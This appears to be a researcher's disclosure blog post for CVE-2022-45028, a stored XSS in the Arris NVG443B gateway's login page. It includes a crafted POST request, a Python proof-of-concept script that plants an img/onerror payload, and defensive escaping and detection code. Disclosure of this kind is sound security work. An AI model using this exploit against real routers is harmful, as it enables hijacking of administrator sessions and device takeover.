Friday, November 4, 2022

[CVE-2022-45028] Unauthenticated Stored XSS in the Arris NVG443B

Update: I reported this vulnerability to MITRE on November 4th, 2022. It has been assigned CVE-2022-45028 with a CVSS score of 6.1 (Medium).


The Arris NVG443B DSL Gateway (distributed by Frontier Communications) running firmware version 9.3.0h3d36 is affected by a pre-authenticated stored Cross-site Scripting (XSS) vulnerability in the configuration web interface. The vulnerability likely affects other firmware versions and Arris products, but I have only confirmed the existence of the issue in the NVG443B.

I first discovered the vulnerability on July 20, 2022, and an Arris/CommScope employee confirmed (via email) that they fixed the vulnerability sometime between then and October 18, 2022:

The CommScope Engineering team confirmed the existence of the vulnerability and the patch has been released.

Unfortunately, the employee didn't clarify which firmware version contains the fix.

At the time of discovery, Shodan indicated that several thousand of these devices were exposed to the internet and running the vulnerable firmware version.


Exploitation

The username field of the login POST request can be used to deliver an XSS payload. An attacker can send an HTTP request such as the following to /cgi-bin/login.ha:

POST /cgi-bin/login.ha HTTP/1.1
Host: 192.168.254.254
Content-Length: 224
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
 
nonce=8b277da8000e57ef989565d34d8479ce3fcb33edee9e25ad&username=%22%2f%3e%0a%3c%69%6d%67%20%73%72%63%3d%65%72%72%20%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%31%29%22%2f%3e%3c%62%72&password=1111111111&Continue=Continue

The next time a user navigates to /cgi-bin/logs.ha, the stored payload is rendered and the XSS is triggered.

This vulnerability can be leveraged to perform actions such as changing the account password for the web interface administrator.
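To make the defect class concrete from the defender's side, here is an added example (not from the original post or the Arris firmware) that models how a log page such as /cgi-bin/logs.ha could render a failed-login record: the unescaped rendering beside the HTML-escaped one, plus a small check that can be run over exported log records to flag usernames carrying markup. The table layout, field names and sample record are assumptions.

```python
import html
import re

# Constructed sample record (not real device output): a failed login whose
# username field carries markup of the kind the advisory describes.
SAMPLE_ENTRY = {
    "time": "2022-07-20 10:15:02",
    "event": "Login failed",
    "username": '"/><img src=err onerror="alert(1)"/><br',
}

FIELDS = ("time", "event", "username")


def render_vulnerable(entry):
    """Interpolates every field straight into HTML: attacker markup survives."""
    cells = (str(entry[k]) for k in FIELDS)
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


def render_fixed(entry):
    """Escapes <, >, & and quotes in every field before it reaches the page."""
    cells = (html.escape(str(entry[k]), quote=True) for k in FIELDS)
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


# Elements a browser will execute or fetch from; a correctly escaped row
# never contains one of these as a real tag.
_LIVE_TAG_RE = re.compile(r"<(img|script|svg|iframe)\b", re.IGNORECASE)


def contains_live_markup(rendered_html):
    """True if the rendered row still carries an executable element."""
    return bool(_LIVE_TAG_RE.search(rendered_html))


def flag_suspicious_usernames(entries):
    """Detection aid for exported log records: returns entries whose username
    contains HTML-significant characters, which a real account name should not."""
    return [e for e in entries if re.search(r'[<>"\'&]', e["username"])]


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(SAMPLE_ENTRY))
    print("fixed:     ", render_fixed(SAMPLE_ENTRY))
```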


Proof of Concept

The following Python script is a PoC demonstrating the XSS. Simply run this script on the same LAN as an Arris NVG443B with the 9.3.0h3d36 firmware, and then navigate to http://192.168.254.254/cgi-bin/logs.ha to trigger the XSS (a benign alert dialog).

#!/usr/bin/env python3
# Author: Sean Pesce

# Required Python 3 libraries:
#     requests

import requests
import sys
import urllib3

# Silence urllib3's warning about unverified connections (verify=False below).
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

NVG443B_DEFAULT_IP = '192.168.254.254'


def get_nonce(host):
    # Fetch the login page and extract the per-session nonce embedded in the form.
    url = f'http://{host}/cgi-bin/login.ha'
    canary = b'nonce" value="'
    response = requests.get(url, verify=False)
    data = response.content
    nonce_pos = data.index(canary) + len(canary)
    data = data[nonce_pos:]
    data = data.split(b'"')[0]
    data = data.decode('ascii')
    return data


def do_xss(host, nonce):
    # Submit a (failing) login whose percent-encoded username is stored by the device.
    url = f'http://{host}/cgi-bin/login.ha'
    body = f'nonce={nonce}&username=%22%2f%3e%0a%3c%69%6d%67%20%73%72%63%3d%65%72%72%20%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%27%53%65%61%6e%50%20%7c%20%58%53%53%27%29%22%2f%3e%3c%62%72&password=1111111111&Continue=Continue'
    response = requests.post(url, verify=False, data=body)
    return response


if __name__ == '__main__':
    if '-h' in sys.argv or '--help' in sys.argv:
        print(f'Usage:\n\tpython3 {sys.argv[0]} [host]\n\nhost: The hostname or IP address of an Arris NVG443B. If none is provided, the default value is {NVG443B_DEFAULT_IP}')
        sys.exit()
    
    HOST = NVG443B_DEFAULT_IP
    if len(sys.argv) > 1:
        HOST = sys.argv[1]
    
    NONCE = get_nonce(HOST)
    print(f'nonce={NONCE}')
    response = do_xss(HOST, NONCE)
    print(response)
    print(f'\nDone. Navigate to http://{HOST}/cgi-bin/logs.ha to trigger the XSS.')


